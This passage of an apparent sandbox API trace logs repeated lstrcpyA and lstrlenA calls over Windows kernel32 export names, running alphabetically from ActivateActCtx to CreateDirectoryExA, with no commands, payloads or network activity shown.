lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.199] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.199] lstrlenA (lpString="ADDATOMA") returned 8 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.199] lstrlenA (lpString="ADDATOMW") returned 8 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.199] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.199] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.200] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.200] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.200] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.200] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.200] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.200] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.200] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.200] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.200] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.200] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.200] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.200] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.200] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.200] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.200] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.200] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.200] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.200] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.200] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.200] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.201] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.201] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.201] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.201] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.201] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.201] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.201] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.201] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.201] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.201] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.201] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.201] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.201] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.201] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.201] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.201] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.201] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.201] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.201] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.201] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.202] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.202] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.202] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.202] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.202] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.202] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.202] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.202] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.202] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.202] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.202] lstrlenA (lpString="BEEP") returned 4 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.202] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.202] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.202] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.202] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.202] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.202] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.202] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.202] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.203] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.203] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.203] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.203] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.203] lstrlenA (lpString="CANCELIO") returned 8 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.203] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.203] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.203] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.203] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.203] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.203] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.203] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.203] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.203] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.203] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.203] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.203] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.203] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.203] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.203] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.204] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.204] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.204] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.204] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.204] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.204] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.204] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.204] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.204] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.204] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.204] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.204] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.204] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.204] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.204] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.205] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.205] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.205] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.205] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.205] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.205] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.205] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.205] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.205] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.205] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.205] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.205] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.205] lstrlenA (lpString="COPYFILEA") returned 9 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.205] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.205] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.205] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.205] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.205] lstrlenA (lpString="COPYFILEW") returned 9 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.205] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.205] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.206] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.206] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.206] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.206] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.206] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.206] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.206] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.206] lstrcpyA (in: 